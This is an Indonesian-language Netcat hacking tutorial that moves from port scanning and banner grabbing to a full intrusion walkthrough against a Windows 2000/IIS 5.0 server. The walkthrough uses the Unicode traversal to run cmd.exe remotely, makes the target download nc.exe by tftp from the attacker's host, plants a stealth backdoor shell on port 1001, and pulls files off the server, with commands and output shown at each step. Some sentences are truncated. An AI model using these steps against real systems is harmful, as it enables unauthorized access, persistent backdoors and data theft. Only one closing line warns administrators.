Saat ini Netcat telah tersedia tidak saja pada sistem operasi Unix dan Linux
pada sistem operasi Windows. Pada tutor kali ini saya menggunakan Netcat
dengan sistem operasi Window pada command line sama dengan perintah
yang terdapat pada Netcat dgn Unix.
Instalasi Netcat pada sistem operasi Windows sangat sederhana.
mendownload dari situs http://www.atstake.com/research/tools/netw
banyak situs hacker lainnya. Namun demikian Anda harus waspada jika dunlut dari
yang tidak Anda kenal betul, bisa jadi tools Netcat-nya sudah dimodifikas
yang dapat mengganggu sistem Anda
Kemudian Anda cukup melakukan unzip terhadap file yang telah Anda download
nc11nt.zip ke dalam sebuah direktori sebagai berikut:
Code:
C:\TMP\NETCAT> dir Volume in drive C has no label. Volume Serial Number is 141F-1208 Directory of C:\TMP\NETCAT 02/23/2003 05:03 PM. 02/23/2003 05:03 PM .. 11/03/1994 07:07 PM 4,765 GETOPT.H 01/04/1998 03:17 PM 69,081 NETCAT.C 01/03/1998 02:37 PM 59,392 NC.EXE 11/28/1997 02:48 PM 12,039 DOEXEC.C 11/28/1997 02:36 PM 544 MAKEFILE 11/06/1996 10:40 PM 22,784 GETOPT.C 07/09/1996 04:01 PM 7,283 GENERIC.H 02/06/1998 03:50 PM 61,780 HOBBIT.TXT 02/06/1998 05:53 PM 6,771 README.TXT 02/22/2000 11:24 AM 2,044 AVEXTRA.TXT 10 File(s) 246,483 bytes 2 Dir(s) 8,868,044,800 bytes free C:\TMP\NETCAT>
bila Anda perlu melakukan kompilasi ulang.
Memulai Netcat
Sebelum memulai, sebaiknya Anda perlu mengetahui fasilitas apa saja yang tersedia pada
Netcat. Untuk itu Anda dapat memulai dengan melihat option yang tersedia. Untuk mengetahui
option yang tersedia pada Netcat, cukup memanggil help-nya pada Dos prompt sebagai berikut:
Code:
C:\TMP\NETCAT> nc -h [v1.10 NT] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [options] [hostname] [port] options: -d detach from console, stealth mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] C:\TMP\NETCAT>
Code:
C:\> nc –opsi
Seperti juga pisau Swiss Army yang memiliki banyak mata pisau beraneka fungsi, maka Netcat
juga memiliki aneka fungsi yang dimiliki tools lainnya, salah satunya adalah “mata pisau” port
scanning
Walaupun tidak selengkap dan secanggih tools Nmap atau Supercan, Netcat dapat digunakan
untuk melihat port mana saja yang terbuka. Berikut ini contoh untuk memeriksa status port web
dari port 10 s./d port 140 dari situs web tertentu, sebagai berikut:
Code:
C:\TMP\NETCAT> nc -v -z server01 10-140 server01 [128.1.9.81] 139 (netbios-ssn) open server01 [128.1.9.81] 113 (auth) open server01 [128.1.9.81] 110 (pop3) open server01 [128.1.9.81] 98 (?) open server01 [128.1.9.81] 80 (http) open server01 [128.1.9.81] 79 (finger) open server01 [128.1.9.81] 25 (smtp) open server01 [128.1.9.81] 23 (telnet) open server01 [128.1.9.81] 21 (ftp) open C:\TMP\NETCAT> Perintah di atas akan melakukan scanning port 10 s/d 140 dari host server01 dengan address IP 128.1.9.81. Option –z merupakan option yang dipergunakan untuk melakukan scanning.
Salah satu cara mendapatkan informasi mengenai sistem operasi dan aplikasi yang dijalankan
oleh sebuah host adalah dengan melakukan banner grabbing atau membaca informasi yang ada
di dalam banner sebuah sistem.
Berikut ini kemampuan Netcat untuk mengambil header suatu situs web yang biasanya
menyimpan informasi penting sebagai berikut (Jangan lupa ketikkan “Get/HTTP” seperti
terlihat pada baris ke-6 dari contoh hasil di atas.)
Code:
C:\TMP\NETCAT> nc -v -n 128.1.71.103 80 (UNKNOWN) [128.1.71.103] 80 (?) open get http HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.0 Date: Sat, 11 Oct 2003 03:34:24 GMT Content-Type: text/html Content-Length: 87Error The parameter is incorrect. C:\TMP\NETCAT>
punya nya pakdhe linus..
Penjelasan:
Penggunaan option –n diperlukan jika address yang Anda berikan adalah berupa nomor IP. Jika
berupa address internet, anda tidak memerlukan option –n tersebut. Port yang diuji adalah port
80.
Dari contoh di atas Anda dapat mengetahui bahwa sistem operasi yang dipergunakan adalah
Microsoft dengan IIS/5.0.
Perhatikan contoh berikutnya:
Code:
C:\TMP\NETCAT> nc -v www.moron.nl 80 www.moron.nl [85.17.231.219] 80 (http) open get/http501 Method Not Implemented Method Not Implemented
get/http to /index.html not supported. Invalid method in request get/http
Apache/1.3.12 Server at www.moron.nl Port 80 C:\TMP\NETCAT>
nomor IP. Dari hasil di atas tidak terlihat sistem operasinya tetapi terlihat bahwa host tersebut
menggunakan Apache Versi 1.3.12.
Skenario Menyusup ke dalam Server Web!
Untuk menyusup ke dalam server web diperlukan beberapa langkah dan ketrampilan tersendiri.
Tidak saja ketrampilan menggunakan Netcat, tetapi juga pengetahuan kita mengenai sistem
target. Dalam contoh skenario kali ini, kita akan menyusup ke sebuah server web yang
menggunakan sistem operasi Windows 2000 dengan IIS 5.0. Untuk itu diperlukan pemahaman
mengenai sebuah bugs dari Microsoft IIS 5.0, yaitu unicode bugs, yang sampai saat ini masih
saja ada server web yang belum dipasang patch karena kelalaian atau ketidaktahuan sang
pengelola sistem.
Fokus kita bukan mengenai apa dan bagaimana bugs Microsoft tersebut, melainkan bagaimana
memanfaatkan Netcat untuk melakukan penyusupan dan bahkan download dokumen dari server
web. Perhatikan, semua dilakukan dengan satu tools, Netcat saja, walaupun bisa saja Anda
menggunakan tools-tools lainnya. Itu sebabnya Netcat disebut sebagai “TCP/IP Swiss Army
Knife”
Mari kita memulai dengan mencari server web yang menggunakan Microsoft Windows 2000
dengan IIS versi 5.0 sebagai berikut (sebagian akan menggunakan option dari netcat yang telah
dijelaskan di atas):
Code:
C:\TMP\NETCAT> nc -v -z ristbook 20-80 ristbook [128.1.71.103] 80 (http) open ristbook [128.1.71.103] 25 (smtp) open ristbook [128.1.71.103] 21 (ftp) open C:\TMP\NETCAT>
Selanjutnya Anda perlu menyelidiki, adakah server ristbook merupakan server web
menggunakan Microsoft dan IIS 4.0/5.0?
Code:
C:\TMP\NETCAT> nc -v ristbook 80 ristbook [128.1.71.103] 80 (http) open get http HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.0 Date: Sat, 11 Oct 2003 08:51:34 GMT Content-Type: text/html Content-Length: 87Error The parameter is incorrect. C:\TMP\NETCAT>
5.0. Selanjutnya kita akan menguji apakah server web ini sudah memasang patch dan terhindar
dari bugs unicode ?
Code:
C:\TMP\NETCAT> nc -v ristbook 80 ristbook [128.1.71.103] 80 (http) open get http://ristbook/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sat, 11 Oct 2003 09:06:52 GMT Content-Type: application/octet-stream Volume in drive C has no label. Volume Serial Number is 0C42-12EA Directory of c:\ 09/17/2001 11:46a 1,012 FRUNLOG.TXT 09/17/2001 11:35aWINDOWS 09/17/2001 11:58a My Documents 09/17/2001 11:35a Program Files 09/17/2001 12:43p ATI 05/05/1999 09:20a 31,512 MAESTRO.COM 09/17/2001 12:50p 0 CONFIG.AGO 05/05/1999 09:20a 11,084 AECU.SYS 09/26/2003 08:35p 30 mstrinf.ini 09/17/2001 12:50p 0 AUTOEXEC.AGO 07/01/2003 07:22p museum 06/06/2001 06:28a 1,071 my_cnf.bak 06/25/2002 07:35p 697 FRONTPG.LOG 08/29/2003 04:16p NAV2001 08/29/2003 04:51p ServicePack 01/28/2002 03:45p HTML 06/17/2002 06:17p 22 autoexec.nav 09/19/2003 04:49p denny 08/27/2003 06:38p 28,290 SCANDISK.LOG 04/05/2003 06:53a 967 command.PIF 06/09/2002 10:16p 442 SETUPXLG.TXT 10/05/2001 03:33p 40,923 c1605r-psn.txt 01/04/2002 12:20p tmp 10/24/2001 02:32p tms20 06/27/2001 11:57p 1,574 index.html.no 11/13/1998 01:23a 106,496 sqlsun.dll 01/28/2002 03:52p 289 sqlsunin.ini 09/26/2003 12:29p 157,817 winzip.log 01/28/2002 03:53p 85,526 Uninst.isu 12/13/2001 04:30p 317 Shortcut to cuteftp.exe.lnk 06/21/2002 10:34a Acrobat3 01/22/2002 03:18p My Received Files 01/28/2002 03:49p LOG 07/30/2002 01:40p 34,565 atapi.exe 04/06/2003 06:41p 82 asoy.ftp 01/28/2002 03:45p Upgrade 12/07/1999 07:00p 236,304 cmdkoe.exe 01/28/2002 03:45p Install 06/25/2002 07:34p Inetpub 07/05/2002 07:02p Documentation 02/12/2002 01:28p 227,467 datacenter1.jpg 02/09/2002 03:29p 2,920 datacenterthumb.jpg 11/15/2001 03:07p 3,384 sqlnet.log 09/17/1999 06:38p 1,234 Table of Contents.htm 06/26/2002 03:22p ftproot 26 File(s) 974,025 bytes 19 Dir(s) 119,435,264 bytes free C:\TMP\NETCAT>
OK, Anda dapat melanjutkan langkah berikutnya dengan menyusupkan tools serba guna kita ke
dalam server web tersebut, ya, mengcopykan netcat ke dalam server tersebut ! Dengan
meletakkan tools serba guna Netcat pada server web, maka Anda dapat mengendalikan server
web tersebut dengan leluasa.
Salah satu cara menyusupkan netcat ke dalam ke dalam server web tersebut adalah
memanfaatkan service tftp (Trivial File Transfer Protocol). Anda dapat memerintahkan server
web target Anda untuk mengupload netcat dari tftp server yang terpasang di komputer Anda.
Untuk itu Anda harus mengaktifkan atau menginstall tftp server pada komputer Anda, jika
belum tersedia. Jika komputer Anda menggunakan sistem operasi Windows, Anda dapat
menginstall aplikasi freeware tftpd32 buatan Philippe Jounin (ph.jounin@computer.org) yang
dapat Anda download dari http://membres.lycos.fr/phjounin/ atau dari situs-sistus hacker
lainnya.
Selanjutnya Anda dapat mengaktifkan tftp server sebagai berikut:
Kemudian masukkan program Netcat yang akan Anda upload ke server web target ke dalam
direktori tftp dari komputer Anda yang telah diinstall tftp. Atau Anda dapat mengarahkan base
directory dari tftp ke direktori program Netcat Anda.
OK, sampai disini Anda telah menyiapkan tftp di komputer Anda yang di dalam base
directorinya berisi Netcat. Selanjutnya kita tak akan membahas lebih detail soal tftpd32, karena
kita akan memfokuskan pada pemanfaatan Netcat.
Langkah selanjutnya untuk mengupload Netcat ke server tujuan menggunakan instruksi Netcat,
sebagai berikut:
Code:
C:\TMP\NETCAT> nc -v ristbook 80 ristbook [128.1.71.103] 80 (http) open get http://ristbook/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+128.1.99 .25+get+nc.exe HTTP/1.1 502 Gateway Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Oct 2003 11:00:54 GMT Content-Length: 215 Content-Type: text/htmlError in CGI Application CGI Error
The specified CGI application misbehaved by not returnin g a complete set of HTTP headers. The headers it did return are:
C:\TMP\NETCAT>
perintah tftp –i 128.1.99.25. IP 128.1.99.25 merupakan komputer Anda yang telah
terpasang tftp server.
Ya, program netcat.exe telah berhasil ditransfer ke server tujuan. Jika Anda menggunakan
tftpd32 pada komputer Anda, maka di layar tftp akan terlihat pesan transfer sukses sebagai
berikut:
Nah, dengan Netcat sudah terpasang diserver tujuan, Anda dapat dengan mudah mengendalikan
server tersebut !
Backdoor
Sudah menjadi kebiasaan para hacker apabila menyusup ke sebuah sistem senantiasa
meninggalkan backdoor. Dengan backdoor Anda dapat masuk dan keluar melalaui jalan pintas
tanpa harus melalui jalur yang semestinya.
Yang perlu Anda lakukan adalah mengaktifkan perintah Netcat yang telah Anda upload pada
server web di atas dengan perintah berikut ini:
Code:
C:\NETCAT> nc –L –p 1001 –d –e cmd.exe C:\NETCAT>
Anda dapat menggunakan port lainnya jika diperlukan untuk mengecoh firewall. Opsi
berikutnya yang sangat dahsyat adalah –d yaitu agar telnet dijalankan secara tersembunyi atau
stealth. Opsi terakhir –e akan mengeksekusi perintah command.exe untuk dipergunakan oleh
koneksi yang masuk.
Masih ingat bagaimana mengeksekusi perintah di atas pada server web
melalui komputer Anda ?
Code:
C:\TMP\NETCAT> nc -v ristbook 80 ristbook [128.1.71.103] 80 (http) open get http://ristbook/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-L+-p+1001+- d+-e+cmd.exe
komputer Anda sebagai berikut:
Code:
C:\TMP\NETCAT> ipconfig (command menunjukkan nomor IP pada komputer Anda) Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 128.1.99.25 Subnet Mask . . . . . . . . . . . : 255.255.0.0 Default Gateway . . . . . . . . . : 128.1.99.25 C:\TMP\NETCAT> nc -v ristbook 1001 ristbook [128.1.71.103] 1001 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. d:\inetpub\scripts> ipconfig (command menunjukkan nomor IP komputer saat ini) ipconfig Windows 2000 IP Configuration Ethernet adapter Local Area Connection 3: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 169.254.1.1 Subnet Mask . . . . . . . . . . . : 255.255.0.0 Default Gateway . . . . . . . . . : Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 128.1.71.103 Subnet Mask . . . . . . . . . . . : 255.255.0.0 Default Gateway . . . . . . . . . : D:\inetpub\scripts> dir
Anda, yaitu 128.1.99.25. Setelah dilakukan perintah nc –v ristbook 1001, Anda masuk ke
server web target. Perintah ipconfig memperlihatkan anda berada di dalam server web,
yaitu IP 128.1.71.103 dan 169.254.1.1 yang ternyata memiliki 2 IP address.
Cara yang sama dengan di atas adalah mengunakan telnet dengan port 1001 sebagai berikut:
Code:
C:\> telnet ristbook 1001 Microsoft(R) Windows 98 (C)Copyright Microsoft Corp 1981-1999. C:\NETCAT> dir
Jika Anda sudah berada di dalam sistem target, pasti Anda tertarik untuk mendownload data
dari sistem target ke komputer Anda atau sebaliknya mengupload data Anda ke sistem target.
Selain menggunakan tftp, Anda dapat melakukan dengan netcat sebagai berikut:
Pada server web target di atas ketikkan perintah:
Nc –l –p 55555 < namafile.pdf
Pada komputer Anda yang akan menerima file ketikkan perintah:
Nc –v 128.1.71.63 > namafile.pdf
NOTERIST [128.1.71.63] 55555 (?) open
^C
Tekan kontrol-C jika file telah selesai Anda transfer. Metode ini sering disebut metode pull. Jika
Anda ingin mengirim file atau upload data dari komputer Anda ke sistem target, maka yang
perlu dilakukan adalah sebagai berikut:
Pada server web target di atas ketikkan perintah:
Nc –l –p 55555 > namafile2.pdf
Pada komputer Anda yang akan mengirim atau upload file ke sistem target ketikkan perintah:
Nc 128.1.71.63 55555 < namafile2.pdf
^C
Masih banyak fasilitas lain yang dapat Anda coba sendiri dari netcat.
*NB :
Untuk keperluan hacking yang lebih spesifik, mungkin masih banyak tools yang dapat Anda
pakai selain netcat. Namun jika Anda harus megerjakan banyak hal dengan seminimal mungkin
tools, maka netcat pilihan yang tepat dan itu sebabnya Netcat disebut sebagai “TCP/IP Swiss
Army Knife”-nya para hacker.
Bagi pengelola sistem komputer, Anda perlu mewaspadai apabila ditemukan Netcat di dalam
server Anda! Beberapa Anti Virus mengidentifikasi Netcat sebagai “virus” yang perlu di
waspadai dan dikarantina.
Seperti juga pisau “Swiss Army”, di tangan orang yang tepat, tools ini akan sangat bermanfaat!
Reference :
• “Netcat – The Swiss Army Knife”, muts@secureIT.co.il
• Stuart McClure, Joel Scambray, George Kurtz "Hacking Exposed: Network Security Secrets
and Solutions", McGraw-Hill Professional Publishing, 2003.
• Tom Armstrong, “Netcat – TheTCP/IP Swiss Army Knife”, SANS Institute 2000-2002
• “Top 75 Security Tools”, Insecure.org,
Sumber Informasu By :www.ilmukomputer.com